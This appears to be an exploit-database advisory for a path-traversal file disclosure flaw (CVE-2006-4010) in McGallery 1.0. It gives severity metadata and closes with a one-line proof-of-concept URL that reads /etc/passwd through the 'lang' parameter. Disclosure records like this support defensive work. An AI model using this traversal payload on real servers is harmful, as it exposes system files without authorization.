header-logo
Suggest Exploit
vendor:
McGallery
by:
Luigi Auriemma
8.5
CVSS
HIGH
File Disclosure Vulnerability
200
CWE
Product Name: McGallery
Affected Version From: McGallery 1.0
Affected Version To: McGallery 1.0
Patch Exists: No
Related CWE: CVE-2006-4010
CPE: a:mcgallery:mcgallery:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2006

McGallery File Disclosure Vulnerability

McGallery is prone to a file disclosure vulnerability which could let remote attackers access files on the computer in the context of the Web server process.

Mitigation:

No known mitigation
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/13963/info

McGallery is prone to a file disclosure vulnerability.

This could let remote attackers access files on the computer in the context of the Web server process. 

http://example.com/mcgallery/admin.php?lang=../../../../../../etc/passwd